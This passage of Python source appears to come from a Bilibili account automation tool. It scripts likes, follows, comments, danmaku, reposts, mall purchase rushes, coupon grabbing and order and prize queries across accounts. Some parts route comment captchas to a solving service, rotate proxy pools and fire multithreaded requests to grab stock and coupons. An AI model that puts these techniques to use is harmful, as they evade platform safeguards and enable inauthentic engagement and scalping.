self._log(f"av{aid}收藏成功")
return True
else:
self._log(f"av{aid}收藏失败 {response}")
return False
# 三连推荐
@__bvid_handle(1, "aid")
def combo(self, aid):
# aid = 稿件av号
url = f"{self.protocol}://api.bilibili.com/x/web-interface/archive/like/triple"
payload = {
'aid': aid,
'csrf': self.get_csrf(),
}
headers = {
'Host': "api.bilibili.com",
'Origin': "https://www.bilibili.com",
'Referer': f"https://www.bilibili.com/video/av{aid}",
}
response = self._requests("post", url, data=payload, headers=headers)
if response and response.get("code") == 0:
self._log(f"av{aid}三连推荐成功")
return True
else:
self._log(f"av{aid}三连推荐失败 {response}")
return False
# 分享
@__bvid_handle(1, "aid")
def share(self, aid):
# aid = 稿件av号
url = f"{self.protocol}://api.bilibili.com/x/web-interface/share/add"
payload = {
'aid': aid,
'jsonp': "jsonp",
'csrf': self.get_csrf(),
}
headers = {
'Host': "api.bilibili.com",
'Origin': "https://www.bilibili.com",
'Referer': f"https://www.bilibili.com/video/av{aid}",
}
response = self._requests("post", url, data=payload, headers=headers)
if response and response.get("code") == 0:
self._log(f"av{aid}分享成功")
return True
else:
self._log(f"av{aid}分享失败 {response}")
return False
# 关注
def follow(self, mid, secret=False):
# mid = 被关注用户UID
# secret = 悄悄关注
url = f"{self.protocol}://api.bilibili.com/x/relation/modify"
payload = {
'fid': mid,
'act': 3 if secret else 1,
're_src': 11,
'jsonp': "jsonp",
'csrf': self.get_csrf(),
}
headers = {
'Host': "api.bilibili.com",
'Origin': "https://space.bilibili.com",
'Referer': f"https://space.bilibili.com/{mid}/",
}
response = self._requests("post", url, data=payload, headers=headers)
if response and response.get("code") == 0:
self._log(f"用户{mid}{'悄悄' if secret else ''}关注成功")
return True
else:
self._log(f"用户{mid}{'悄悄' if secret else ''}关注失败 {response}")
return False
# 批量关注
def follow_batch(self, mids):
# mids = 被关注用户UID
url = f"{self.protocol}://api.bilibili.com/x/relation/batch/modify"
payload = {
'fids': ",".join(map(str, mids)),
'act': 1,
'csrf': self.get_csrf(),
're_src': 222,
}
headers = {
'Host': "api.bilibili.com",
'Referer': "https://www.bilibili.com/blackboard/live/activity-NfUS01P8.html",
}
response = self._requests("post", url, data=payload, headers=headers)
if response and response.get("code") == 0:
self._log(f"用户{', '.join(map(str, mids))}批量关注成功")
return True
else:
self._log(f"用户{', '.join(map(str, mids))}批量关注失败 {response}")
return False
# 弹幕发送
@__bvid_handle(1, "aid")
def danmaku_post(self, aid, message, page=1, moment=-1):
# aid = 稿件av号
# message = 弹幕内容
# page = 分P
# moment = 弹幕发送时间
url = f"{self.protocol}://api.bilibili.com/x/web-interface/view?aid={aid}"
response = self._requests("get", url)
if response and response.get("data") is not None:
page_info = {page['page']: {
'cid': page['cid'],
'duration': page['duration'],
} for page in response['data']['pages']}
if page in page_info:
oid = page_info[page]['cid']
duration = page_info[page]['duration']
else:
self._log(f"av{aid}不存在P{page}")
return False
else:
self._log(f"av{aid}信息解析失败")
return False
url = f"{self.protocol}://api.bilibili.com/x/v2/dm/post"
headers = {
'Host': "api.bilibili.com",
'Origin': "https://www.bilibili.com",
'Referer': f"https://www.bilibili.com/video/av{aid}",
}
while True:
payload = {
'type': 1,
'oid': oid,
'msg': message,
'aid': aid,
'progress': int(moment * 1E3) if moment != -1 else random.randint(0, duration * 1E3),
'color': 16777215,
'fontsize': 25,
'pool': 0,
'mode': 1,
'rnd': int(time.time() * 1E6),
'plat': 1,
'csrf': self.get_csrf(),
}
response = self._requests("post", url, data=payload, headers=headers)
if response and response.get("code") is not None:
if response['code'] == 0:
self._log(f"av{aid}(P{page})弹幕\"{message}\"发送成功")
return True
elif response['code'] == 36703:
self._log(f"av{aid}(P{page})弹幕发送频率过快, 10秒后重试")
time.sleep(10)
else:
self._log(f"av{aid}(P{page})弹幕\"{message}\"发送失败 {response}")
return False
# 评论点赞
def comment_like(self, otype, oid, rpid):
# otype = 作品类型
# oid = 作品ID
# rpid = 评论ID
if Bilibili.patterns.get(otype) is None:
return False
url = f"{self.protocol}://api.bilibili.com/x/v2/reply/action"
payload = {
'oid': oid,
'type': Bilibili.patterns[otype]['id'],
'rpid': rpid,
'action': 1,
'jsonp': "jsonp",
'csrf': self.get_csrf(),
}
headers = {
'Content-Type': "application/x-www-form-urlencoded; charset=UTF-8",
'Host': "api.bilibili.com",
'Origin': "https://www.bilibili.com",
'Referer': f"{Bilibili.patterns[otype]['prefix']}{oid}",
}
response = self._requests("post", url, data=payload, headers=headers)
if response and response.get("code") == 0:
self._log(f"评论{rpid}点赞成功")
return True
else:
self._log(f"评论{rpid}点赞失败 {response}")
return False
# 评论发表
def comment_post(self, otype, oid, message):
# otype = 作品类型
# oid = 作品ID
# message = 评论内容
if Bilibili.patterns.get(otype) is None:
return False
url = f"{self.protocol}://api.bilibili.com/x/v2/reply/add"
while True:
payload = {
'oid': oid,
'type': Bilibili.patterns[otype]['id'],
'message': message,
'plat': 1,
'jsonp': "jsonp",
'csrf': self.get_csrf(),
}
headers = {
'Content-Type': "application/x-www-form-urlencoded; charset=UTF-8",
'Host': "api.bilibili.com",
'Origin': "https://www.bilibili.com",
'Referer': f"{Bilibili.patterns[otype]['prefix']}{oid}",
}
response = self._requests("post", url, data=payload, headers=headers)
if response and response.get("code") is not None:
if response['code'] == 0:
self._log(f"作品{oid}提交评论\"{message}\"成功")
return True
elif response['code'] == 12015:
response = self._requests("get", response['data']['url'], headers=headers, decode_level=1)
captcha = self._solve_captcha(response)
if captcha:
self._log(f"评论验证码识别结果: {captcha}")
payload['code'] = captcha
else:
self._log(f"评论验证码识别服务暂时不可用, 1分钟后重试")
time.sleep(60)
elif response['code'] == 12035:
self._log(f"作品{oid}提交评论\"{message}\"失败, 该账号被UP主列入评论黑名单")
return False
elif response['code'] == -105:
if "code" in payload:
payload.pop("code")
else:
self._log(f"作品{oid}提交评论\"{message}\"失败 {response}")
return False
# 动态点赞
def dynamic_like(self, did):
# did = 动态ID
url = f"{self.protocol}://api.vc.bilibili.com/dynamic_like/v1/dynamic_like/thumb"
payload = {
'uid': self.get_uid(),
'dynamic_id': did,
'up': 1,
'csrf_token': self.get_csrf(),
}
headers = {
'Content-Type': "application/x-www-form-urlencoded",
'Host': "api.vc.bilibili.com",
'Origin': "https://space.bilibili.com",
'Referer': "https://space.bilibili.com/208259/",
}
response = self._requests("post", url, data=payload, headers=headers)
if response and response.get("code") == 0:
self._log(f"动态{did}点赞成功")
return True
else:
self._log(f"动态{did}点赞失败 {response}")
return False
# 动态转发
def dynamic_repost(self, did, message="转发动态", ats=[]):
# did = 动态ID
# message = 转发内容
# ats = 被@用户UID列表
def uid_to_nickname(mid):
url = f"{self.protocol}://api.bilibili.com/x/web-interface/card?mid={mid}"
response = self._requests("get", url)
if response and response.get("code") == 0:
return response['data']['card']['name']
else:
return ""
url = f"{self.protocol}://api.vc.bilibili.com/dynamic_repost/v1/dynamic_repost/repost"
ctrl = []
for at in zip(ats, [uid_to_nickname(mid) for mid in ats]):
ctrl.append({
'data': str(at[0]),
'location': len(message) + 1,
'length': len(at[1]) + 1,
'type': 1,
})
message = f"{message} @{at[1]}"
payload = {
'uid': self.get_uid(),
'dynamic_id': did,
'content': message,
'at_uids': ",".join([str(at) for at in ats]),
'ctrl': json.dumps(ctrl),
'csrf_token': self.get_csrf(),
}
headers = {
'Content-Type': "application/x-www-form-urlencoded",
'Host': "api.vc.bilibili.com",
'Origin': "https://space.bilibili.com",
'Referer': "https://space.bilibili.com/208259/",
}
response = self._requests("post", url, data=payload, headers=headers)
if response and response.get("code") == 0:
self._log(f"动态{did}转发成功")
return True
else:
self._log(f"动态{did}转发失败 {response}")
return False
# 动态清理
def dynamic_purge(self):
def get_lottery_dynamics():
headers = {
'Host': "api.vc.bilibili.com",
'Origin': "https://space.bilibili.com",
'Referer': f"https://space.bilibili.com/{self.get_uid()}/dynamic",
}
dynamics = []
offset = 0
while True:
url = f"{self.protocol}://api.vc.bilibili.com/dynamic_svr/v1/dynamic_svr/space_history?visitor_uid={self.get_uid()}&host_uid={self.get_uid()}&offset_dynamic_id={offset}"
response = self._requests("get", url, headers=headers)
if response and response.get("code") == 0:
if response['data']['has_more']:
dynamics.extend([{
'did': card['desc']['dynamic_id'],
'lottery_did': card['desc']['orig_dy_id'],
} for card in response['data']['cards'] if card['desc']['orig_type'] == 2 or card['desc']['orig_type'] == 1024])
offset = response['data']['cards'][-1]['desc']['dynamic_id']
else:
return dynamics
dynamics = get_lottery_dynamics()
self._log(f"发现{len(dynamics)}条互动抽奖动态")
delete = 0
for dynamic in dynamics:
url = f"{self.protocol}://api.vc.bilibili.com/lottery_svr/v2/lottery_svr/lottery_notice?dynamic_id={dynamic['lottery_did']}"
headers = {
'Host': "api.vc.bilibili.com",
'Origin': "https://t.bilibili.com",
'Referer': "https://t.bilibili.com/lottery/h5/index/",
}
response = self._requests("get", url, headers=headers)
if response and response.get("code") == 0:
expired = response['data']['status'] == 2 or response['data']['status'] == -1
winning = any(self.get_uid() in winners for winners in [response['data'].get("lottery_result", {}).get(f"{level}_prize_result", []) for level in ["first", "second", "third"]])
if not expired:
self._log(f"动态{dynamic['lottery_did']}尚未开奖({time.strftime('%Y-%m-%d %H:%M:%S', time.localtime(response['data']['lottery_time']))}), 跳过")
else:
if winning:
self._log(f"动态{dynamic['lottery_did']}中奖, 跳过")
else:
url = f"{self.protocol}://api.vc.bilibili.com/dynamic_repost/v1/dynamic_repost/rm_rp_dyn"
payload = {
'uid': self.get_uid(),
'dynamic_id': dynamic['did'],
'csrf_token': self.get_csrf(),
}
headers = {
'Content-Type': "application/x-www-form-urlencoded",
'Host': "api.vc.bilibili.com",
'Origin': "https://space.bilibili.com",
'Referer': f"https://space.bilibili.com/{self.get_uid()}/dynamic",
}
response = self._requests("post", url, data=payload, headers=headers)
if response and response.get("code") == 0:
delete += 1
self._log(f"动态{dynamic['lottery_did']}未中奖, 清理成功")
else:
self._log(f"动态{dynamic['lottery_did']}未中奖, 清理失败")
time.sleep(1)
self._log(f"清理了{delete}条动态")
# 系统通知查询
def system_notice(self, time_span=["", ""], keyword=[]):
# time_span = 时间范围
# keyword = 包含关键字
cursor_span = [int(time.mktime(time.strptime(element, "%Y-%m-%d %H:%M:%S")) * 1E9) if element else "" for element in time_span]
headers = {
'Host': "message.bilibili.com",
'Referer': "https://message.bilibili.com/",
}
notice_list = []
cursor = cursor_span[1]
while True:
url = f"{self.protocol}://message.bilibili.com/api/notify/query.sysnotify.list.do?data_type=1{'&cursor=' + str(cursor) if cursor else ''}"
response = self._requests("get", url, headers=headers)
if response and response.get("code") == 0:
for notice in response['data']:
if not cursor_span[0] or notice['cursor'] > cursor_span[0]:
if not keyword or any(keyword in notice['title'] or keyword in notice['content'] for keyword in keyword):
notice_list.append({
'time': notice['time_at'],
'title': notice['title'],
'content': notice['content'],
})
else:
break
else:
if len(response['data']) == 20:
cursor = notice['cursor']
continue
self._log(f"系统通知获取成功, 总计{len(notice_list)}条通知")
for notice in notice_list:
self._log(f"{notice['title']}({notice['time']}): {notice['content']}")
self.__push_to_queue("system_notice", notice_list)
return notice_list
# 会员购抢购
def mall_rush(self, item_id, thread=1, headless=True, timeout=10):
# item_id = 商品ID
# thread = 线程数
# headless = 隐藏窗口
# timeout = 超时刷新
def executor(thread_id):
def find_and_click(class_name):
try:
element = driver.find_element_by_class_name(class_name)
element.click()
except:
element = None
return element
options = webdriver.ChromeOptions()
options.add_argument("log-level=3")
if headless:
options.add_argument("headless")
else:
options.add_argument("disable-infobars")
options.add_argument("window-size=374,729")
if platform.system() == "Linux":
options.add_argument("no-sandbox")
options.add_experimental_option("mobileEmulation", {'deviceName': "Nexus 5"})
if platform.system() == "Windows":
options.binary_location = "chrome-win\\chrome.exe"
driver = webdriver.Chrome(executable_path="chromedriver.exe" if platform.system() == "Windows" else "chromedriver", options=options)
driver.get(f"{self.protocol}://mall.bilibili.com/detail.html?itemsId={item_id}")
for key, value in self.get_cookies().items():
driver.add_cookie({
'name': key,
'value': value,
'domain': ".bilibili.com",
})
self._log(f"(线程{thread_id})商品{item_id}开始监视库存")
url = f"{self.protocol}://mall.bilibili.com/mall-c/items/info?itemsId={item_id}"
while True:
response = self._requests("get", url)
if response and response.get("code") == 0 and response['data']['activityInfoVO']['serverTime'] >= response['data']['activityInfoVO']['startTime'] if response['data']['activityInfoVO'] else True:
break
timestamp = time.time()
in_stock = False
while True:
try:
result = {class_name: find_and_click(class_name) for class_name in ["bottom-buy-button", "button", "dot", "pay-btn", "expire-time-format", "alert-ok", "error-button"]}
if result['bottom-buy-button']:
if "bottom-buy-disable" not in result['bottom-buy-button'].get_attribute("class"):
if not in_stock:
self._log(f"(线程{thread_id})商品{item_id}已开放购买")
in_stock = True
else:
if in_stock:
self._log(f"(线程{thread_id})商品{item_id}暂无法购买, 原因为{result['bottom-buy-button'].text}")
in_stock = False
driver.refresh()
timestamp = time.time()
if result['pay-btn']:
timestamp = time.time()
if result['alert-ok']:
driver.refresh()
if result['expire-time-format']:
self._log(f"(线程{thread_id})商品{item_id}订单提交成功, 请在{result['expire-time-format'].text}内完成支付")
driver.quit()
return True
if time.time() - timestamp > timeout:
self._log(f"(线程{thread_id})商品{item_id}操作超时, 当前页面为{driver.current_url}")
driver.get(f"{self.protocol}://mall.bilibili.com/detail.html?itemsId={item_id}")
timestamp = time.time()
except:
pass
threads = []
for i in range(thread):
threads.append(threading.Thread(target=executor, args=(i + 1,)))
for thread in threads:
thread.start()
for thread in threads:
thread.join()
# 会员购优惠卷领取
def mall_coupon(self, coupon_id, thread=1):
# coupon_id = 优惠券ID
# thread = 线程数
def get_coupon_info(coupon_id):
url = f"{self.protocol}://mall.bilibili.com/mall-c/coupon/user_coupon_code_receive_status_list"
payload = {
'couponIds': [str(coupon_id)],
'mid': "",
'csrf': self.get_csrf(),
}
headers = {
'Host': "mall.bilibili.com",
'Origin': "https://www.bilibili.com",
}
response = self._requests("post", url, json=payload, headers=headers)
if response and response.get("code") == 0:
return {
'end': response['data'][0]['receiveEndTime'],
'message': response['data'][0]['couponStatusMsg'],
'name': response['data'][0]['couponName'],
'total': response['data'][0]['provideNum'],
'remain': response['data'][0]['remainNum'],
'start': response['data'][0]['receiveStartTime'],
'status': response['data'][0]['receiveStatus'],
}
def get_server_time(target_time=0):
url = f"{self.protocol}://mall.bilibili.com/mall-c/common/time/remain?v={int(time.time())}&targetTime={target_time}"
headers = {
'Host': "mall.bilibili.com",
'Origin': "https://www.bilibili.com",
}
response = self._requests("get", url, headers=headers)
if response and response.get("code") == 0:
return {
'current': response['data']['serverTime'],
'remain': response['data']['remainSeconds'],
}
def executor(thread_id):
url = f"{self.protocol}://mall.bilibili.com/mall-c/coupon/create_coupon_code?couponId={coupon_id}&deviceId="
payload = {'csrf': self.get_csrf()}
headers = {
'Host': "mall.bilibili.com",
'Origin': "https://www.bilibili.com",
}
nonlocal flag
while not flag:
response = self._requests("post", url, json=payload, headers=headers)
if response and response.get("code") is not None:
if response['code'] == 83094004:
self._log(f"(线程{thread_id})会员购优惠卷\"{coupon_info['name']}\"(ID={coupon_id})领取成功")
elif response['code'] == 83110005:
self._log(f"(线程{thread_id})会员购优惠卷\"{coupon_info['name']}\"(ID={coupon_id})领取失败, 优惠券领取数量已达到上限")
elif response['code'] == 83110015:
self._log(f"(线程{thread_id})会员购优惠卷\"{coupon_info['name']}\"(ID={coupon_id})领取失败, 优惠券库存不足")
else:
continue
else:
self._log(f"(线程{thread_id})会员购优惠卷\"{coupon_info['name']}\"(ID={coupon_id})领取失败, 当前IP请求过于频繁")
flag = True
coupon_info = get_coupon_info(coupon_id)
if coupon_info:
if coupon_info['message'] == "可领取":
server_time = get_server_time(coupon_info['start'])
if server_time:
delay = max(server_time['remain'] - 3, 0)
self._log(f"会员购优惠卷\"{coupon_info['name']}\"(ID={coupon_id})可领取时间为{time.strftime('%Y-%m-%d %H:%M:%S', time.localtime(coupon_info['start']))}至{time.strftime('%Y-%m-%d %H:%M:%S', time.localtime(coupon_info['end']))}, 库存{coupon_info['remain']}张, 将于{delay}秒后开始领取")
time.sleep(delay)
else:
self._log(f"会员购服务器时间获取失败")
return
else:
self._log(f"会员购优惠卷\"{coupon_info['name']}\"(ID={coupon_id}){coupon_info['message']}")
return
else:
self._log(f"会员购优惠卷{coupon_id}信息获取失败")
return
flag = False
threads = []
for i in range(thread):
threads.append(threading.Thread(target=executor, args=(i + 1,)))
for thread in threads:
thread.start()
for thread in threads:
thread.join()
# 会员购订单列表查询
def mall_order_list(self, status=0, type=[2]):
# status = 订单状态
# type = 订单类型
def get_order_list(status, type):
headers = {
'Origin': "https://mall.bilibili.com",
'Referer': "https://mall.bilibili.com/orderlist.html",
}
order_list = []
page = 0
while True:
url = f"{self.protocol}://show.bilibili.com/api/ticket/ordercenter/list?pageNum={page}&pageSize=20&status={status}&customer=0&platform=h5&v={int(time.time())}"
response = self._requests("get", url, headers=headers)
if response and response.get("errno") == 0:
data = response['data']['list']
if data:
for order in data:
if not type or order['order_type'] in type:
order_list.append(order)
page += 1
else:
self._log(f"会员购订单列表获取成功, 总计{len(order_list)}个订单")
break
else:
self._log(f"会员购订单列表获取失败 {response}")
return order_list
def get_order_detail(order_id):
url = f"{self.protocol}://mall.bilibili.com/mall-c/order/detail?orderId={order_id}&platform=h5&time={int(time.time())}"
headers = {
'Origin': "https://mall.bilibili.com",
'Referer': f"https://mall.bilibili.com/orderdetail.html?orderId={order_id}",
}
response = self._requests("get", url, headers=headers)
if response and response.get("code") == 0 and response['data']['vo']:
data = response['data']['vo']
self._log(f"会员购订单{order_id}详情获取成功, 包含\"{data['skuList'][0]['itemsName']}\"等{len(data['skuList'])}件商品")
return data
else:
self._log(f"会员购订单{order_id}详情获取失败 {response}")
return {}
def get_order_express(order_id):
url = f"{self.protocol}://mall.bilibili.com/mall-c/order/express/detail?orderId={order_id}"
headers = {
'Origin': "https://mall.bilibili.com",
'Referer': f"https://mall.bilibili.com/orderdetail.html?orderId={order_id}",
}
for _ in range(5):
response = self._requests("get", url, headers=headers)
if response and response.get("code") == 0 and response['data']['vo']:
data = response['data']['vo']
self._log(f"会员购订单{order_id}物流获取成功, 状态为{data['state_v']}")
return data
time.sleep(3)
self._log(f"会员购订单{order_id}物流获取失败 {response}")
return {}
order_list = []
for order in get_order_list(status, type):
order_detail = get_order_detail(order['order_id'])
order_express = get_order_express(order['order_id']) if order_detail and order_detail['orderExpress'] else {}
order_list.append({
'id': order.get("order_id"),
'item': [{
'id': item.get("itemsId"),
'name': item.get("itemsName"),
'spec': item.get("skuSpec"),
'number': item.get("skuNum"),
'price': item.get("price"),
} for item in order_detail.get("skuList", [])],
'create': time.strftime("%Y-%m-%d %H:%M:%S", time.localtime(order.get("order_ctime"))) if order.get("current_timestamp") else None,
'status': {
'code': order.get("status"),
'name': order.get("status_name"),
},
'pay': {
'id': order_detail['orderBasic'].get("payId") if order_detail.get("orderBasic") else None,
'time': order.get("pay_ctime") if order.get("pay_ctime") != "0000-00-00 00:00:00" else None,
'channel': order_detail['orderBasic'].get("paymentChannel") if order_detail.get("orderBasic") else None,
'total': order.get("show_money") / 100 if order.get("show_money") else None,
'origin': order_detail['orderBasic'].get("payTotalMoney") if order_detail.get("orderBasic") else None,
'discount': order_detail['orderBasic'].get("discountMoneys") if order_detail.get("orderBasic") else None,
'express': order.get("express_fee") / 100 if order.get("express_fee") else None,
},
'preorder': {
'phone': order_detail['extData'].get("notifyPhoneOrigin") if order_detail.get("extData") else None,
'front': {
'total': order_detail['extData'].get("frontPayMoney") if order_detail.get("extData") else None,
'origin': order_detail['extData'].get("frontMoney") if order_detail.get("extData") else None,
'discount': order_detail['extData'].get("frontDisMoney") if order_detail.get("extData") else None,
},
'final': {
'total': order_detail['extData'].get("finalPayMoney") if order_detail.get("extData") else None,
'origin': order_detail['extData'].get("finalMoney") if order_detail.get("extData") else None,
'discount': order_detail['extData'].get("finalDisMoney") if order_detail.get("extData") else None,
'start': time.strftime("%Y-%m-%d %H:%M:%S", time.localtime(order_detail['extData'].get("finalMoneyStart") / 1E3)) if order_detail.get("extData") and order_detail['extData'].get("finalMoneyStart") else None,
'end': time.strftime("%Y-%m-%d %H:%M:%S", time.localtime(order_detail['extData'].get("finalMoneyEnd") / 1E3)) if order_detail.get("extData") and order_detail['extData'].get("finalMoneyStart") else None,
},
},
'shipping': {
'name': order_detail['orderDeliver'].get("deliverName") if order_detail.get("orderDeliver") else None,
'phone': order_detail['orderDeliver'].get("deliverPhone") if order_detail.get("orderDeliver") else None,
'address': order_detail['orderDeliver'].get("deliverAddr") if order_detail.get("orderDeliver") else None,
'company': order_detail['orderExpress'].get("com_v") if order_detail.get("orderExpress") else None,
'number': order_detail['orderExpress'].get("sno") if order_detail.get("orderExpress") else None,
'status': order_express.get("state_v"),
'detail': order_express.get("detail"),
},
})
self.__push_to_queue("mall_order_list", order_list)
return order_list
# 会员购优惠券列表查询
def mall_coupon_list(self, status=1):
# status = 优惠券状态
status_map = {
1: "validList",
2: "usedList",
3: "invalidList",
}
if status not in status_map:
return []
headers = {
'Referer': "https://mall.bilibili.com/couponlist.html?noTitleBar=1",
}
coupon_list = []
page = 1
while True:
url = f"{self.protocol}://mall.bilibili.com/mall-c/coupon/list?status={status}&pageIndex={page}&pageSize=20"
response = self._requests("get", url, headers=headers)
if response and response.get("code") == 0:
if response['data'][status_map[status]]:
for coupon in response['data'][status_map[status]]['list']:
coupon_list.append({
'name': coupon['couponCodeName'],
'description': coupon['couponDesc'],
'detail': coupon['couponDetail'],
'discount': coupon['couponDiscount'],
'status': coupon['status'],
'type': coupon['couponCodeType'],
'start': time.strftime('%Y-%m-%d %H:%M:%S', time.localtime(coupon['useStartTime'] / 1E3)) if coupon['useStartTime'] else None,
'end': time.strftime('%Y-%m-%d %H:%M:%S', time.localtime(coupon['useEndTime'] / 1E3)) if coupon['useEndTime'] else None,
'use': time.strftime('%Y-%m-%d %H:%M:%S', time.localtime(coupon['useTime'] / 1E3)) if coupon['useTime'] else None,
'expire': time.strftime('%Y-%m-%d %H:%M:%S', time.localtime(coupon['expireDate'] / 1E3)) if coupon['expireDate'] else None,
})
if response['data'][status_map[status]]['hasNextPage']:
page += 1
continue
self._log(f"会员购优惠券列表获取成功, 总计{len(coupon_list)}张优惠券")
for coupon in coupon_list:
self._log(f"会员购优惠券: {coupon['name']}" + (f", 失效时间为{coupon['expire']}" if coupon['expire'] else f", 使用时间为{coupon['use']}" if coupon['use'] else f", 使用有效期为{coupon['start']}至{coupon['end']}" if coupon['start'] and coupon['end'] else ""))
break
else:
self._log(f"会员购优惠券列表获取失败 {response}")
break
self.__push_to_queue("mall_coupon_list", coupon_list)
return coupon_list
# 会员购奖品列表查询
def mall_prize_list(self, status=0, type=[1, 2]):
# status = 奖品状态
# type = 奖品类型
headers = {
'Referer': "https://mall.bilibili.com/prizecenter.html",
}
prize_list = []
page = 1
while True:
url = f"{self.protocol}://mall.bilibili.com/mall-c/prize/list?pageNum={page}&pageSize=20&type={status}&v={int(time.time())}"
response = self._requests("get", url, headers=headers)
if response and response.get("code") == 0:
for prize in response['data']['pageInfo']['list']:
if not type or prize['prizeType'] in type:
prize_list.append({
'name': prize['prizeName'],
'source': prize['sourceName'],
'status': prize['status'],
'type': prize['prizeType'],
'expire': time.strftime('%Y-%m-%d %H:%M:%S', time.localtime(prize['expireTime'])),
})
if response['data']['pageInfo']['hasNextPage']:
page += 1
else:
self._log(f"会员购奖品列表获取成功, 总计{len(prize_list)}个奖品, {response['data']['waitDeliveryNum']}个奖品待发货")
for prize in prize_list:
self._log(f"会员购奖品: {prize['name']}, 来自{prize['source']}, 领取有效期至{prize['expire']}")
break
else:
self._log(f"会员购奖品列表获取失败 {response}")
break
self.__push_to_queue("mall_prize_list", prize_list)
return prize_list
# 直播奖品列表查询
def live_prize_list(self):
headers = {
'Origin': "https://link.bilibili.com",
'Referer': "https://link.bilibili.com/p/center/index",
}
prize_list = []
page = 1
while True:
url = f"{self.protocol}://api.live.bilibili.com/lottery/v1/award/award_list?page={page}&month="
response = self._requests("get", url, headers=headers)
if response and response.get("code") == 0:
for prize in response['data']['list']:
prize_list.append({
'name': prize['gift_name'],
'number': prize['gift_num'],
'source': prize['source'],
'status': prize['status'],
'type': prize['gift_type'],
'create': prize['create_time'],
'expire': prize['expire_time'],
})
if page < response['data']['total_page']:
page += 1
else:
self._log(f"直播奖品列表获取成功, 总计{len(prize_list)}个奖品")
for prize in prize_list:
self._log(f"直播奖品: {prize['name']} x{prize['number']}, 来自{prize['source']}, 中奖时间为{prize['create']}, 领取有效期至{prize['expire']}")
break
else:
self._log(f"直播奖品列表获取失败 {response}")
break
self.__push_to_queue("live_prize_list", prize_list)
return prize_list
def detect_charset(file, fallback="utf-8"):
with open(file, "rb") as f:
detector = chardet.UniversalDetector()
for line in f.readlines():
detector.feed(line)
if detector.done:
return detector.result['encoding']
return fallback
def download(url, save_as=None):
print(f"正在下载{url}")
if save_as is None:
save_as = url.split("/")[-1]
with open(save_as, "wb") as f:
response = requests.get(url, stream=True)
length = response.headers.get("content-length")
if length:
length = int(length)
receive = 0
for data in response.iter_content(chunk_size=100 * 1024):
f.write(data)
receive += len(data)
percent = receive / length
print(f"\r[{'=' * int(50 * percent)}{' ' * (50 - int(50 * percent))}] {percent:.0%}", end="", flush=True)
print()
else:
f.write(response.content)
return save_as
def decompress(file, remove=True):
shutil.unpack_archive(file)
if remove:
os.remove(file)
print(f"{file}解压完毕")
def export(queue, config):
bucket = {}
log_file = open(config['global']['log'], "a", encoding="utf-8") if config['global']['log'] else None
try:
while True:
packet = queue.get()
if isinstance(packet, dict) and all(key in packet for key in ['uid', 'manufacturer', 'data']):
if packet['manufacturer'] == "log":
if log_file:
log_file.write(packet['data'] + "\n")
else:
if packet['manufacturer'] not in bucket:
bucket[packet['manufacturer']] = {}
if packet['uid'] not in bucket[packet['manufacturer']]:
bucket[packet['manufacturer']][packet['uid']] = []
if isinstance(packet['data'], list):
bucket[packet['manufacturer']][packet['uid']].extend(packet['data'])
else:
bucket[packet['manufacturer']][packet['uid']].append(packet['data'])
elif packet is None:
for manufacturer, data in bucket.items():
if config.get(manufacturer, {}).get("export"):
with open(config[manufacturer]['export'], "w", encoding="utf-8") as f:
f.write(json.dumps(data, indent=4, ensure_ascii=False))
return
finally:
if log_file:
log_file.close()
def wrapper(arg):
def delay_wrapper(func, interval, arg_list=[()], shuffle=False):
if shuffle:
random.shuffle(arg_list)
for i in range(len(arg_list)):
func(*arg_list[i])
if i < len(arg_list) - 1:
time.sleep(interval)
config, account, queue = arg['config'], arg['account'], arg['queue']
instance = Bilibili(config['global']['https'], queue)
if config['proxy']['enable']:
if isinstance(config['proxy']['pool'], str):
try:
with open(config['proxy']['pool'], "r", encoding=detect_charset(config['proxy']['pool'])) as f:
instance.set_proxy(add=[proxy for proxy in f.read().strip().splitlines() if proxy and proxy[0] != "#"])
except:
pass
elif isinstance(config['proxy']['pool'], list):
instance.set_proxy(add=config['proxy']['pool'])
if instance.login(force_refresh_token=config['user']['force_refresh_token'], **account):
threads = []
if config['get_user_info']['enable']:
threads.append(threading.Thread(target=instance.get_user_info))
if config['set_privacy']['enable']:
threads.append(threading.Thread(target=instance.set_privacy, args=(config['set_privacy']['show_favourite'], config['set_privacy']['show_bangumi'], config['set_privacy']['show_tag'], config['set_privacy']['show_reward'], config['set_privacy']['show_info'], config['set_privacy']['show_game'])))
if config['silver_to_coin']['enable']:
threads.append(threading.Thread(target=instance.silver_to_coin))
if config['watch']['enable']:
threads.append(threading.Thread(target=delay_wrapper, args=(instance.watch, 5, list(zip(config['watch']['aid'])))))
if config['like']['enable']:
threads.append(threading.Thread(target=delay_wrapper, args=(instance.like, 5, list(zip(config['like']['aid'])))))
if config['reward']['enable']:
threads.append(threading.Thread(target=delay_wrapper, args=(instance.reward, 5, list(zip(config['reward']['aid'], config['reward']['double'])))))
if config['favour']['enable']:
threads.append(threading.Thread(target=delay_wrapper, args=(instance.favour, 5, list(zip(config['favour']['aid'])))))
if config['combo']['enable']:
threads.append(threading.Thread(target=delay_wrapper, args=(instance.combo, 5, list(zip(config['combo']['aid'])))))
if config['share']['enable']:
threads.append(threading.Thread(target=delay_wrapper, args=(instance.share, 5, list(zip(config['share']['aid'])))))
if config['follow']['enable']:
threads.append(threading.Thread(target=delay_wrapper, args=(instance.follow, 5, list(zip(config['follow']['mid'], config['follow']['secret'])))))
if config['follow_batch']['enable']:
threads.append(threading.Thread(target=delay_wrapper, args=(instance.follow_batch, 5, list((config['follow_batch']['mid'][i:i + 50],) for i in range(0, len(config['follow_batch']['mid']), 50)))))
if config['danmaku_post']['enable']:
threads.append(threading.Thread(target=delay_wrapper, args=(instance.danmaku_post, 5, list(zip(config['danmaku_post']['aid'], config['danmaku_post']['message'], config['danmaku_post']['page'], config['danmaku_post']['moment'])))))
if config['comment_like']['enable']:
threads.append(threading.Thread(target=delay_wrapper, args=(instance.comment_like, 5, list(zip(config['comment_like']['otype'], config['comment_like']['oid'], config['comment_like']['rpid'])))))
if config['comment_post']['enable']:
threads.append(threading.Thread(target=delay_wrapper, args=(instance.comment_post, 5, list(zip(config['comment_post']['otype'], config['comment_post']['oid'], config['comment_post']['message'])))))
# for comment in zip(config['comment_post']['otype'], config['comment_post']['oid'], config['comment_post']['message']):
# threads.append(threading.Thread(target=instance.comment_post, args=(comment[0], comment[1], comment[2])))
if config['dynamic_like']['enable']:
threads.append(threading.Thread(target=delay_wrapper, args=(instance.dynamic_like, 5, list(zip(config['dynamic_like']['did'])))))
if config['dynamic_repost']['enable']:
